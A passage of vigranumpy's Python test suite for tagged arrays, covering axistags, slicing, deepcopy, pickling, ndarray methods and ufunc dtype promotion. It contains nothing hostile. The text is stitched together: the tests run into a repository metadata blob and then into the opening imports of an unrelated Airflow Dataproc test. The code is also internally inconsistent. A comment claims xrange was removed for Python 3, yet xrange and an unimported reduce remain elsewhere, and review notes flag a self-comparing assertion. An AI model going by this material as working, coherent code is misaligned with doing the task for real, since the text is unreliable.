    checkArray(arraytypes.Vector2Volume, 2, 3)
    cshape = (20, 10, 5)
    shape = (5, 10, 20)
    rshape = (2, 5, 10, 20)
    compat = ["testAny",
              "testArray4Unstrided", "testArray4Strided",
              "testVolumeVector2Unstrided", "testVolumeVector2Strided",
              "testVolumeMultibandStrided"]
    for order, s in (('C', cshape), ('V', shape), ('F', shape)):
        checkCompatibility(arraytypes.Vector2Volume(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray4Strided",
              "testVolumeVector2Strided",
              "testVolumeMultibandStrided"]
    checkCompatibility(arraytypes.Vector2Volume(cshape, order='C', value=2).view(numpy.ndarray), compat)
    # generic 4D views (channel axis first in the exported shape)
    vol = arraytypes.Vector2Volume(cshape, order='C')
    checkShape(vt.viewArray4Unstrided(vol), rshape)
    assert (vol[0, 0, 0] == (1, 0)).all()
    vol = arraytypes.Vector2Volume(shape, order='V')
    checkShape(vt.viewArray4Unstrided(vol), rshape)
    assert (vol[0, 0, 0] == (1, 0)).all()
    vol = arraytypes.Vector2Volume(shape, order='F')
    checkShape(vt.viewArray4Strided(vol), rshape)
    assert (vol[:, 0, 0, 0] == (1, 0)).all()
    # TinyVector-typed views
    vol = arraytypes.Vector2Volume(cshape, order='C')
    checkShape(vt.viewVolumeVector2Unstrided(vol), shape)
    assert (vol[0, 0, 0] == (1, 1)).all()
    vol = arraytypes.Vector2Volume(shape, order='V')
    checkShape(vt.viewVolumeVector2Unstrided(vol), shape)
    assert (vol[0, 0, 0] == (1, 1)).all()
def testVector3Volume():
    """Run the generic array checks for the 3-band Vector3Volume type."""
    cls = arraytypes.Vector3Volume
    checkArray(cls, 3, 3)
def testVector4Volume():
    """Run the generic array checks for the 4-band Vector4Volume type."""
    cls = arraytypes.Vector4Volume
    checkArray(cls, 4, 3)
def testTaggedShape():
    """Check makeAxistags() argument handling, taggedShape propagation
    through the C++ test wrappers, and taggedView()."""
    # --- makeAxistags() from a dimension count ---
    a = arraytypes.makeAxistags(4)
    assert_equal(repr(a), 'x y z c')
    a = arraytypes.makeAxistags(4, order='C')
    assert_equal(repr(a), 'z y x c')
    a = arraytypes.makeAxistags(4, order='F')
    assert_equal(repr(a), 'c x y z')
    a = arraytypes.makeAxistags(4, order='C', noChannels=True)
    assert_equal(repr(a), 't z y x')
    a = arraytypes.makeAxistags(4, noChannels=True)
    assert_equal(repr(a), 'x y z t')
    # --- makeAxistags() from an existing AxisTags object: always returns a copy ---
    aa = arraytypes.makeAxistags('xyc')
    a = arraytypes.makeAxistags(aa)
    assert_equal(repr(a), 'x y c')
    assert(a is not aa)
    a = arraytypes.makeAxistags(aa, order='C')
    assert_equal(repr(a), 'y x c')
    assert(a is not aa)
    a = arraytypes.makeAxistags(aa, order='F')
    assert_equal(repr(a), 'c x y')
    assert(a is not aa)
    a = arraytypes.makeAxistags(aa, noChannels=True)
    assert_equal(repr(a), 'x y')
    assert(a is not aa)
    a = arraytypes.makeAxistags(aa, order='V', noChannels=True)
    assert_equal(repr(a), 'x y')
    assert(a is not aa)
    a = arraytypes.makeAxistags(aa, order='C', noChannels=True)
    assert_equal(repr(a), 'y x')
    assert(a is not aa)
    a = arraytypes.makeAxistags(aa, order='F', noChannels=True)
    assert_equal(repr(a), 'x y')
    assert(a is not aa)
    # --- makeAxistags() from a tag string ---
    a = arraytypes.makeAxistags('xyc', order='V')
    assert_equal(repr(a), 'x y c')
    a = arraytypes.makeAxistags('xyc', order='C')
    assert_equal(repr(a), 'y x c')
    a = arraytypes.makeAxistags('xyc', order='F')
    assert_equal(repr(a), 'c x y')
    a = arraytypes.makeAxistags('xyc', order='F', noChannels=True)
    assert_equal(repr(a), 'x y')
    a = arraytypes.makeAxistags('xyc', order='V', noChannels=True)
    assert_equal(repr(a), 'x y')
    a = arraytypes.makeAxistags('xyc', order='C', noChannels=True)
    assert_equal(repr(a), 'y x')
    # --- taggedShape propagation: single-band Image (explicit channel axis) ---
    a = arraytypes.Image((20,10))
    a.axistags.setChannelDescription("in")
    res = vt.checkTaggedShapeMultiband(a)
    assert_equal(res[0].shape, (20,10,1))
    assert_equal(res[0].axistags, a.axistags)
    assert_equal(res[0].axistags[2].description, "in")
    assert_equal(res[1].shape, (20,10,1))
    assert_equal(res[1].axistags, a.axistags)
    assert_equal(res[1].axistags[2].description, "res2")
    assert_equal(res[2].shape, (20,10,1))
    assert_equal(res[2].axistags, a.axistags)
    assert_equal(res[2].axistags[2].description, "res3")
    assert_equal(res[3].shape, (20,10,3))
    assert_equal(res[3].axistags, a.axistags)
    assert_equal(res[3].axistags[2].description, "res4")
    assert_equal(res[4].shape, (20,10,1))
    assert_equal(res[4].axistags, a.axistags)
    assert_equal(res[4].axistags[2].description, "res5")
    assert_equal(res[5].shape, (20,10,3))
    assert_equal(res[5].axistags, a.axistags)
    assert_equal(res[5].axistags[2].description, "res6")
    res = vt.checkTaggedShapeSingleband(a)
    assert_equal(res[0].shape, (20,10,1))
    assert_equal(res[0].axistags, a.axistags)
    assert_equal(res[0].axistags[2].description, "in")
    assert_equal(res[1].shape, (20,10,1))
    assert_equal(res[1].axistags, a.axistags)
    assert_equal(res[1].axistags[2].description, "res2")
    assert_equal(res[2].shape, (20,10,1))
    assert_equal(res[2].axistags, a.axistags)
    assert_equal(res[2].axistags[2].description, "res3")
    assert_equal(res[3].shape, (20,10,3))
    assert_equal(res[3].axistags, a.axistags)
    assert_equal(res[3].axistags[2].description, "res4")
    assert_equal(res[4].shape, (20,10,1))
    assert_equal(res[4].axistags, a.axistags)
    assert_equal(res[4].axistags[2].description, "res5")
    assert_equal(res[5].shape, (20,10,3))
    assert_equal(res[5].axistags, a.axistags)
    assert_equal(res[5].axistags[2].description, "res6")
    # --- two-band Image ---
    a = arraytypes.Image((20,10,2))
    a.axistags.setChannelDescription("in")
    res = vt.checkTaggedShapeMultiband(a)
    assert_equal(res[0].shape, (20,10,2))
    assert_equal(res[0].axistags, a.axistags)
    assert_equal(res[0].axistags[2].description, "in")
    assert_equal(res[1].shape, (20,10,2))
    assert_equal(res[1].axistags, a.axistags)
    assert_equal(res[1].axistags[2].description, "res2")
    assert_equal(res[2].shape, (20,10,1))
    assert_equal(res[2].axistags, a.axistags)
    assert_equal(res[2].axistags[2].description, "res3")
    assert_equal(res[3].shape, (20,10,3))
    assert_equal(res[3].axistags, a.axistags)
    assert_equal(res[3].axistags[2].description, "res4")
    assert_equal(res[4].shape, (20,10,1))
    assert_equal(res[4].axistags, a.axistags)
    assert_equal(res[4].axistags[2].description, "res5")
    assert_equal(res[5].shape, (20,10,3))
    assert_equal(res[5].axistags, a.axistags)
    assert_equal(res[5].axistags[2].description, "res6")
    # --- ScalarImage: no channel axis on the input ---
    a = arraytypes.ScalarImage((20,10))
    a.axistags.setChannelDescription("in")
    resaxistags = copy.copy(a.axistags)
    resaxistags.insertChannelAxis()
    res = vt.checkTaggedShapeMultiband(a)
    assert_equal(res[0].shape, (20,10))
    assert_equal(res[0].axistags, a.axistags)
    assert_equal(len(res[0].axistags), 2)
    assert_equal(res[1].shape, (20,10))
    assert_equal(res[1].axistags, a.axistags)
    assert_equal(len(res[1].axistags), 2)
    assert_equal(res[2].shape, (20,10))
    assert_equal(res[2].axistags, a.axistags)
    assert_equal(len(res[2].axistags), 2)   # BUGFIX: originally re-checked res[1] (copy-paste slip)
    assert_equal(res[3].shape, (20,10,3))
    assert_equal(res[3].axistags, resaxistags)
    assert_equal(res[3].axistags[2].description, "res4")
    assert_equal(res[4].shape, (20,10))
    assert_equal(res[4].axistags, a.axistags)
    assert_equal(len(res[4].axistags), 2)
    assert_equal(res[5].shape, (20,10,3))
    assert_equal(res[5].axistags, resaxistags)
    assert_equal(res[5].axistags[2].description, "res6")
    res = vt.checkTaggedShapeSingleband(a)
    assert_equal(res[0].shape, (20,10))
    assert_equal(res[0].axistags, a.axistags)
    assert_equal(len(res[0].axistags), 2)
    assert_equal(res[1].shape, (20,10))
    assert_equal(res[1].axistags, a.axistags)
    assert_equal(len(res[1].axistags), 2)
    assert_equal(res[2].shape, (20,10))
    assert_equal(res[2].axistags, a.axistags)
    assert_equal(len(res[2].axistags), 2)   # BUGFIX: originally re-checked res[1] (copy-paste slip)
    assert_equal(res[3].shape, (20,10,3))
    assert_equal(res[3].axistags, resaxistags)
    assert_equal(res[3].axistags[2].description, "res4")
    assert_equal(res[4].shape, (20,10))
    assert_equal(res[4].axistags, a.axistags)
    assert_equal(len(res[4].axistags), 2)
    assert_equal(res[5].shape, (20,10,3))
    assert_equal(res[5].axistags, resaxistags)
    assert_equal(res[5].axistags[2].description, "res6")
    # --- taggedView() ---
    a = numpy.zeros((3,4,5))
    at = AxisTags(AxisInfo.x, AxisInfo.y, AxisInfo.z)
    r = arraytypes.taggedView(a, at)
    assert_equal(r.shape, (3,4,5))
    assert_equal(r.axistags, at)
    assert(r.axistags is not at)
    r = arraytypes.taggedView(a, 'xyz')
    assert_equal(r.shape, (3,4,5))
    assert_equal(r.axistags, at)
    r = arraytypes.taggedView(a, 'cyx')
    assert_equal(r.shape, (3,4,5))
    assert_equal(repr(r.axistags), 'c y x')
    # a tag string plus an explicit order is contradictory and must throw
    try:
        r = arraytypes.taggedView(a, 'cxy', order='C')
        raise AssertionError("arraytypes.taggedView() failed to throw.")
    except RuntimeError:
        pass
    a = arraytypes.taggedView(a, 'zyx')
    r = arraytypes.taggedView(a, order='C')
    assert_equal(r.shape, (3,4,5))
    assert_equal(repr(r.axistags), 'z y x')
    r = arraytypes.taggedView(a, order='V')
    assert_equal(r.shape, (5,4,3))
    assert_equal(repr(r.axistags), 'x y z')
    r = arraytypes.taggedView(a, order='F')
    assert_equal(r.shape, (5,4,3))
    assert_equal(repr(r.axistags), 'x y z')
    # dropping an axis, then re-tagging with an inserted channel axis
    a = a[0,...]
    r = arraytypes.taggedView(a, 'xcy')
    assert_equal(r.shape, (5,1,4))
    assert_equal(repr(r.axistags), 'x c y')
    r = arraytypes.taggedView(a, 'yxc')
    assert_equal(r.shape, (4,5,1))
    assert_equal(repr(r.axistags), 'y x c')
    # incompatible tag sets must throw, with or without force
    try:
        r = arraytypes.taggedView(a, 'xcz')
        raise AssertionError("arraytypes.taggedView() failed to throw.")
    except RuntimeError:
        pass
    try:
        r = arraytypes.taggedView(a, 'xcz', force=True)
        raise AssertionError("arraytypes.taggedView() failed to throw.")
    except RuntimeError:
        pass
    r = arraytypes.taggedView(a, 'xz', force=True)
    assert_equal(r.shape, (4,5))
    assert_equal(repr(r.axistags), 'x z')
    # appending a channel axis via newaxis()
    a = a[..., arraytypes.newaxis('c')]
    r = arraytypes.taggedView(a, order='V')
    assert_equal(r.shape, (5, 4, 1))
    assert_equal(repr(r.axistags), 'x y c')
    r = arraytypes.taggedView(a, order='V', noChannels=True)
    assert_equal(r.shape, (5, 4))
    assert_equal(repr(r.axistags), 'x y')
def testDeepcopy():
    """deepcopy must preserve contents, contiguity flags, and axistags,
    and must yield an independent data buffer."""
    for shape, order in (((10, 4, 3), 'C'), ((4, 10, 3), 'V'), ((3, 4, 10), 'F')):
        src = arraytypes.RGBImage(numpy.random.random(shape), order=order)
        clone = copy.deepcopy(src)
        assert numpy.all(src == clone)
        assert_equal(clone.flags.c_contiguous, src.flags.c_contiguous)
        assert_equal(clone.flags.f_contiguous, src.flags.f_contiguous)
        assert_equal(clone.axistags, src.axistags)
        # mutating the original must not leak into the copy
        src[0, 0, 0] += 42
        assert clone[0, 0, 0] != src[0, 0, 0]
def testDeepcopyWithAttributes():
    """deepcopy must carry custom instance attributes along with the data."""
    source = arraytypes.Image((320, 200), order='C')
    source.myCustomAttribute = 42
    duplicate = copy.deepcopy(source)
    assert hasattr(duplicate, "myCustomAttribute")
    assert_equal(duplicate.myCustomAttribute, 42)
def testDeepcopyWithCyclicReference():
    """deepcopy must resolve attribute cycles back to the copied objects."""
    first = arraytypes.Image((320, 200), order='C')
    second = arraytypes.Image((320, 200), order='C')
    first.myCustomAttribute = second
    second.backLink = first
    duplicate = copy.deepcopy(first)
    assert hasattr(duplicate, "myCustomAttribute")
    # the cycle must point at the new copy, not at the original
    assert duplicate.myCustomAttribute.backLink is duplicate
def testPickle():
    """Arrays must survive a pickle round-trip with layout and axistags intact."""
    import pickle
    for shape, order in (((10, 4, 3), 'C'), ((4, 10, 3), 'V'), ((3, 4, 10), 'F')):
        original = arraytypes.RGBImage(numpy.random.random(shape), order=order)
        restored = pickle.loads(pickle.dumps(original))
        assert_equal(restored.shape, original.shape)
        assert_equal(restored.strides, original.strides)
        assert_equal(restored.axistags, original.axistags)
        assert numpy.all(original == restored)
def testZMQ():
    """Round-trip arrays through a ZeroMQ PUSH/PULL pair in-process.

    The test is skipped (returns silently) when pyzmq is unavailable or
    socket setup fails — this is a deliberate best-effort guard.
    """
    try:
        import zmq
        ctx = zmq.Context.instance()
        sender = zmq.Socket(ctx, zmq.PUSH)
        receiver = zmq.Socket(ctx, zmq.PULL)
        sender.bind('inproc://a')
        receiver.connect('inproc://a')
    except Exception:
        # BUGFIX: was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit; Exception keeps the skip behavior
        # without masking interpreter-level signals.
        return
    for shape, order in (((10, 4, 3), 'C'), ((4, 10, 3), 'V'), ((3, 4, 10), 'F')):
        a = arraytypes.RGBImage(numpy.random.random(shape), order=order)
        a.sendSocket(sender, copy=False)
        b = arraytypes.VigraArray.receiveSocket(receiver, copy=False)
        assert_equal(b.shape, a.shape)
        assert_equal(b.strides, a.strides)
        assert_equal(b.axistags, a.axistags)
        assert numpy.all(a == b)
def testSlicing():
    """Slicing must drop, keep, or insert axistags to match the result shape."""
    a = arraytypes.Vector2Volume((5,4,3))
    # BUGFIX: was `xrange`, which does not exist on Python 3; `range`
    # behaves identically here on both Python 2 and 3.
    a.flat[...] = range(a.size)
    tags = arraytypes.VigraArray.defaultAxistags('xyzc')
    assert_equal(tags, a.axistags)
    # the trivial slice preserves everything
    b = a[...]
    assert_true((a==b).all())
    assert_equal(tags, b.axistags)
    # a scalar index removes the corresponding axis together with its tag
    b = a[...,0]
    assert_equal(b.shape, a.shape[:-1])
    assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xyz'))
    assert_equal(b[3,2,1], a[3,2,1,0])
    b = a[1,...]
    assert_equal(b.shape, a.shape[1:])
    assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('yzc'))
    assert_equal(b[3,2,1], a[1,3,2,1])
    b = a[:,2,...]
    assert_equal(b.shape, (5,3,2))
    assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xzc'))
    assert_equal(b[3,2,1], a[3,2,2,1])
    b = a[:,1,2,...]
    assert_equal(b.shape, (5,2))
    assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xc'))
    assert_equal(b[2,1], a[2,1,2,1])
    b = a[2:4, :, 2, ...]
    assert_equal(b.shape, (2, 4, 2))
    assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xyc'))
    assert_equal(b[0,2,1], a[2,2,2,1])
    # newaxis(AxisInfo.t) inserts a singleton axis carrying the given tag
    b = a[1:4, :, arraytypes.newaxis(arraytypes.AxisInfo.t), 1, ...]
    assert_equal(b.shape, (3, 4, 1, 2))
    assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xytc'))
    assert_equal(b[0,2,0,0], a[1,2,1,0])
    # plain None inserts a singleton axis with an unknown (default) tag
    b = a[..., None, :,1]
    assert_equal(b.shape, (5, 4, 1, 3))
    rtags = arraytypes.AxisTags(arraytypes.AxisInfo.x, arraytypes.AxisInfo.y, arraytypes.AxisInfo(), arraytypes.AxisInfo.z)
    assert_equal(b.axistags, rtags)
    assert_equal(b[0,3,0,1], a[0,3,1,1])
    # subarray() keeps all axistags
    b = a.subarray((4,3,2))
    assert_equal(b.shape, (4,3,2,2))
    assert_true((a[:4,:3,:2,:]==b).all())
    assert_equal(tags, b.axistags)
    b = a.subarray((1,1,1),(4,3,2))
    assert_equal(b.shape, (3,2,1,2))
    assert_true((a[1:4,1:3,1:2]==b).all())
    assert_equal(tags, b.axistags)
    b = a.subarray((1,1,1,1),(4,3,2,2))
    assert_equal(b.shape, (3,2,1,1))
    assert_true((a[1:4,1:3,1:2,1:]==b).all())
    assert_equal(tags, b.axistags)
def testMethods():
    """Exercise the ndarray-method overrides of VigraArray (argmax, cumsum, mean,
    nonzero, repeat, squeeze, swapaxes, take, transpose, ...), verifying both the
    numeric results and the axistag propagation of each method.

    Axis arguments are given by tag key (e.g. axis='y') rather than index.
    """
    a = arraytypes.ScalarImage((20, 30))
    ones = arraytypes.ScalarImage((20, 30), value=1)
    a.ravel()[...] = range(a.size)
    for k, i in zip(a.flat, xrange(a.size)):
        assert_equal(k, i)
    assert (a.flatten() == range(a.size)).all()
    assert (a >= 0).all()
    assert not (a == 0).all()
    assert (a == 0).any()
    assert not (a == -1).any()
    # Reductions accept an axis *key*; a is a ramp, so extrema are at the ends.
    assert_equal(a.argmax(), a.size-1)
    assert (a.argmax(axis='y') == a.shape[1]-1).all()
    assert_equal(a.argmin(), 0)
    assert (a.argmin(axis='y') == 0).all()
    assert (ones.cumsum()-1 == a.ravel()).all()
    oc = ones.cumsum(axis='x')-1
    for s in oc.sliceIter('y'):
        assert (s == range(a.shape[0])).all()
    assert (ones.cumprod() == 1).all()
    assert (ones.cumprod(axis='x') == 1).all()
    assert_equal(a.max(), a.size-1)
    assert (a.max(axis='y') == range(a.size-a.shape[0], a.size)).all()
    assert_equal(a.mean(dtype=numpy.longdouble), (a.size - 1.0) / 2.0)
    assert (a.mean(axis='y', dtype=numpy.longdouble) ==
            range((a.size-a.shape[0])//2, (a.size+a.shape[0])//2)).all()
    assert_equal(a.min(), 0)
    assert (a.min(axis='y') == range(a.shape[0])).all()
    # nonzero() returns one index array per axis, each tagged with that axis.
    n = arraytypes.ScalarImage(numpy.array([[1, 0, 0],[0, 1, 1],[1, 0, 1]]))
    nz = n.nonzero()
    assert (nz[0] == [0, 1, 1, 2, 2]).all()
    assert_equal(nz[0].axistags, n.defaultAxistags('x'))
    assert (nz[1] == [0, 1, 2, 0, 2]).all()
    assert_equal(nz[1].axistags, n.defaultAxistags('y'))
    assert_equal(ones.prod(), 1.0)
    assert (ones.prod(axis='y') == [1]*ones.shape[0]).all()
    assert_equal(a.ptp(), a.size-1)
    assert (a.ptp(axis='x') == [a.shape[0]-1]*a.shape[1]).all()
    r = arraytypes.ScalarImage((2,2))
    r.ravel()[...] = range(4)
    assert (r.repeat(1) == r.ravel()).all()
    assert (r.repeat(2) == reduce(lambda x,y: x+[y,y], range(4), [])).all()
    assert (r.repeat([0,1,2,3]) == [1,2,2,3,3,3]).all()
    assert (r.repeat(2, axis='y').ravel() == [0,1,0,1,2,3,2,3]).all()
    assert (r.repeat([1,2], axis='y').ravel() == [0,1,2,3,2,3]).all()
    # Indexing with bare AxisInfo objects inserts tagged singleton axes;
    # squeeze() removes them again, restoring the original shape and tags.
    s = a[arraytypes.AxisInfo.c,:,arraytypes.AxisInfo.z,:,arraytypes.AxisInfo.t]
    assert_equal(s.shape, (1, a.shape[0], 1, a.shape[1], 1))
    assert_equal(s.axistags,a.defaultAxistags('cxzyt'))
    ss = s.squeeze()
    assert_equal(ss.shape, a.shape)
    assert_equal(ss.axistags,a.axistags)
    assert_equal(ones.std(dtype=numpy.longdouble), 0.0)
    assert (ones.std(axis='x', dtype=numpy.longdouble) == [0.0]*a.shape[1]).all()
    assert_equal(ones.sum(dtype=numpy.longdouble), ones.size)
    assert (ones.sum(axis='x', dtype=numpy.longdouble) == [a.shape[0]]*a.shape[1]).all()
    # swapaxes: by default tags travel with their axes; keepTags=True leaves
    # the tag order unchanged while the data axes swap.
    b = a.swapaxes(0, 1)
    assert_equal(b.shape, (a.shape[1], a.shape[0]))
    assert_equal(len(b.axistags), 2)
    assert_equal(b.axistags[0], a.axistags[1])
    assert_equal(b.axistags[1], a.axistags[0])
    b = a.swapaxes(0, 1, keepTags=True)
    assert_equal(b.shape, (a.shape[1], a.shape[0]))
    assert_equal(len(b.axistags), 2)
    assert_equal(b.axistags, a.axistags)
    rt = r.take([1,2])
    assert (rt == [1,2]).all()
    assert_equal(rt.axistags, arraytypes.AxisTags(1))
    rt = r.take([0,1], axis='y')
    assert (rt == r).all()
    # NOTE(review): this compares rt.axistags to itself, which is trivially
    # true — presumably r.axistags was intended; confirm before changing.
    assert_equal(rt.axistags, rt.axistags)
    assert_equal(ones.var(dtype=numpy.longdouble), 0.0)
    assert (ones.var(axis='x', dtype=numpy.longdouble) == [0.0]*a.shape[1]).all()
    # transpose: same tag semantics as swapaxes, with and without an explicit
    # axis permutation and with keepTags=True.
    a = arraytypes.Image((5,4,3))
    b = a.transpose()
    assert_equal(b.shape, (3,4,5))
    assert_equal(len(b.axistags), len(a.axistags))
    assert_equal(b.axistags[0], a.axistags[2])
    assert_equal(b.axistags[1], a.axistags[1])
    assert_equal(b.axistags[2], a.axistags[0])
    b = a.transpose((1,2,0))
    assert_equal(b.shape, (4,3,5))
    assert_equal(len(b.axistags), len(a.axistags))
    assert_equal(b.axistags[0], a.axistags[1])
    assert_equal(b.axistags[1], a.axistags[2])
    assert_equal(b.axistags[2], a.axistags[0])
    b = a.transpose(keepTags=True)
    assert_equal(b.shape, (3,4,5))
    assert_equal(len(b.axistags), len(a.axistags))
    assert_equal(b.axistags, a.axistags)
    b = a.transpose((1,2,0), keepTags=True)
    assert_equal(b.shape, (4,3,5))
    assert_equal(len(b.axistags), len(a.axistags))
    assert_equal(b.axistags, a.axistags)
def testUfuncs():
    """Verify vigra's ufunc wrappers: dtype promotion rules for mixed-type
    arithmetic, axistag propagation through every operator, broadcasting of a
    (1,1) array against a (2,2) array, and explicit output-array support in
    ufunc.add.
    """
    # NOTE(review): importing `bool` from numpy is the deprecated numpy.bool
    # alias (removed in numpy >= 1.24); the file must pin an older numpy.
    from numpy import bool, int8, uint8, int16, uint16, int32, uint32, int64, uint64
    from numpy import float32, float64, longdouble, complex64, complex128, clongdouble
    integers = [ int8, uint8, int16, uint16, int32, uint32, int64, uint64]
    floats = [float32, float64, longdouble]
    compl = [complex64, complex128, clongdouble]
    types = integers + floats + compl
    # One constant-valued 2x2 array (value 2) and one 1x1 array (value 1) per dtype.
    arrays, ones = {}, {}
    for t in types:
        arrays[t] = arraytypes.ScalarImage((2,2), t, value=2)
        ones[t] = arraytypes.ScalarImage((1,1), t, value=1)
    # Same-type arithmetic: result keeps dtype and axistags.
    for t, a in iteritems(arrays):
        b = -a
        assert_equal(t, b.dtype)
        assert_equal(a.axistags, b.axistags)
        if not numpyHasComplexNegateBug or t is not clongdouble:
            assert (b == -t(2)).all()
        b = a + a
        assert_equal(t, b.dtype)
        assert_equal(a.axistags, b.axistags)
        assert (b == t(4)).all()
        b = a == a
        assert_equal(bool, b.dtype)
        assert_equal(a.axistags, b.axistags)
        assert (b == True).all()
        # (1,1) op (2,2): broadcasting keeps the larger shape and its tags.
        b = ones[t] + a
        assert_equal(a.shape, b.shape)
        assert_equal(a.axistags, b.axistags)
        assert_equal(t, b.dtype)
        assert (b == t(3)).all()
        b = a + ones[t]
        assert_equal(a.shape, b.shape)
        assert_equal(a.axistags, b.axistags)
        assert_equal(t, b.dtype)
        assert (b == t(3)).all()
        # Python scalar operands do not widen the array dtype.
        b = 3 + a
        assert_equal(t, b.dtype)
        assert_equal(a.axistags, b.axistags)
        assert (b == t(5)).all()
        b = a + 3
        assert_equal(t, b.dtype)
        assert_equal(a.axistags, b.axistags)
        assert (b == t(5)).all()
    # Mixed integer/integer arithmetic promotes to int32 (or int64 when either
    # operand is already 8 bytes wide).
    for i in integers:
        a1 = arrays[i]
        for j in integers:
            if i == j:
                continue
            a2 = arrays[j]
            b = a1 * a2
            if a1.dtype.itemsize < 8 and a2.dtype.itemsize < 8:
                assert_equal(int32, b.dtype)
            else:
                assert_equal(int64, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == 4).all()
            b = a1 <= a2
            assert_equal(bool, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == True).all()
        # Integer mixed with float/complex promotes to the float/complex type.
        for j in floats + compl:
            a2 = arrays[j]
            b = a1 * a2
            assert_equal(j, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == 4).all()
            b = a2 * a1
            assert_equal(j, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == 4).all()
            b = a1 >= a2
            assert_equal(bool, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == True).all()
            b = a2 > a1
            assert_equal(bool, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == False).all()
        b = a1 + 1
        assert (b == 3).all()
        assert_equal(a1.dtype, b.dtype)
        assert_equal(a1.axistags, b.axistags)
        # Integer array + Python float promotes to float32/float64 by itemsize.
        b = a1 + 1.0
        assert_equal(a1.axistags, b.axistags)
        assert (b == 3.0).all()
        if a1.dtype.itemsize < 8:
            assert_equal(float32, b.dtype)
        else:
            assert_equal(float64, b.dtype)
    # Float mixed with complex promotes to the complex type.
    for i in floats:
        a1 = arrays[i]
        for j in compl:
            if i == j:
                continue
            a2 = arrays[j]
            b = a1 * a2
            assert_equal(j, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == 4).all()
            b = a2 * a1
            assert_equal(j, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == 4).all()
            b = a1 >= a2
            assert_equal(bool, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == True).all()
            b = a2 > a1
            assert_equal(bool, b.dtype)
            assert_equal(a1.axistags, b.axistags)
            assert (b == False).all()
        b = a1 + 0.5
        assert (b == 2.5).all()
        assert_equal(a1.dtype, b.dtype)
        assert_equal(a1.axistags, b.axistags)
        # modf returns (fractional, integral), both in the input dtype with tags.
        fractional, integral = ufunc.modf(b)
        assert (fractional == 0.5).all()
        assert (integral == 2.0).all()
        assert_equal(a1.dtype, fractional.dtype)
        assert_equal(a1.axistags, fractional.axistags)
        assert_equal(a1.dtype, integral.dtype)
        assert_equal(a1.axistags, integral.axistags)
    # Pairwise float/complex promotion always picks the wider operand.
    assert_equal(float64, (arrays[float32]+arrays[float64]).dtype)
    assert_equal(float64, (arrays[float64]+arrays[float32]).dtype)
    assert_equal(longdouble, (arrays[float32]+arrays[longdouble]).dtype)
    assert_equal(longdouble, (arrays[longdouble]+arrays[float32]).dtype)
    assert_equal(longdouble, (arrays[float64]+arrays[longdouble]).dtype)
    assert_equal(longdouble, (arrays[longdouble]+arrays[float64]).dtype)
    assert_equal(complex128, (arrays[complex64]+arrays[complex128]).dtype)
    assert_equal(complex128, (arrays[complex128]+arrays[complex64]).dtype)
    assert_equal(clongdouble, (arrays[complex64]+arrays[clongdouble]).dtype)
    assert_equal(clongdouble, (arrays[clongdouble]+arrays[complex64]).dtype)
    assert_equal(clongdouble, (arrays[complex128]+arrays[clongdouble]).dtype)
    assert_equal(clongdouble, (arrays[clongdouble]+arrays[complex128]).dtype)
    # abs() of a complex array yields the matching real dtype.
    b = abs(arrays[complex64])
    assert (b == 2.0).all()
    assert_equal(float32, b.dtype)
    assert_equal(arrays[complex64].axistags, b.axistags)
    b = abs(arrays[complex128])
    assert (b == 2.0).all()
    assert_equal(float64, b.dtype)
    assert_equal(arrays[complex128].axistags, b.axistags)
    b = abs(arrays[clongdouble])
    assert (b == 2.0).all()
    assert_equal(longdouble, b.dtype)
    assert_equal(arrays[clongdouble].axistags, b.axistags)
    # uint8 arithmetic wraps around (255 + 255 == 254 mod 256) ...
    a = arraytypes.ScalarImage((2,2), uint8, value=255)
    b = a + a
    assert (b == 254).all()
    b = a + 255
    assert (b == 254).all()
    b = 255 + a
    assert (b == 254).all()
    # ... unless an explicit wider output array is supplied to the ufunc.
    b = arraytypes.ScalarImage((2,2), int32, value=0)
    bb = ufunc.add(a, a, b)
    assert bb is b
    assert (b == 510).all()
    b = arraytypes.ScalarImage((2,2), int32, value=0)
    bb = ufunc.add(a, 255, b)
    assert bb is b
    assert (b == 510).all()
    b = arraytypes.ScalarImage((2,2), int32, value=0)
    bb = ufunc.add(255, a, b)
    assert bb is b
    assert (b == 510).all()
| {
"content_hash": "07c4fa68d81a861f3f6101ea512b7e8d",
"timestamp": "",
"source": "github",
"line_count": 1704,
"max_line_length": 218,
"avg_line_length": 36.505868544600936,
"alnum_prop": 0.617110889624795,
"repo_name": "dstoe/vigra",
"id": "c5764cd97122797ce8304cb791e574c6df3bb9b3",
"size": "62208",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "vigranumpy/test/test_arraytypes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3203"
},
{
"name": "C",
"bytes": "113143"
},
{
"name": "C++",
"bytes": "21346826"
},
{
"name": "CMake",
"bytes": "105677"
},
{
"name": "CSS",
"bytes": "65018"
},
{
"name": "HTML",
"bytes": "471605"
},
{
"name": "Inno Setup",
"bytes": "6501"
},
{
"name": "JavaScript",
"bytes": "24066"
},
{
"name": "Jupyter Notebook",
"bytes": "3391055"
},
{
"name": "Matlab",
"bytes": "32719"
},
{
"name": "Python",
"bytes": "464605"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "TeX",
"bytes": "15209"
}
],
"symlink_target": ""
} |
import os
from tests.providers.google.cloud.operators.test_dataproc_operator_system_helper import DataprocTestHelper
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_DATAPROC_KEY
from tests.test_utils.gcp_system_helpers import CLOUD_DAG_FOLDER, provide_gcp_context, skip_gcp_system
from tests.test_utils.system_tests_class import SystemTest
# GCS bucket used to stage the test's PySpark job; override via GCP_DATAPROC_BUCKET.
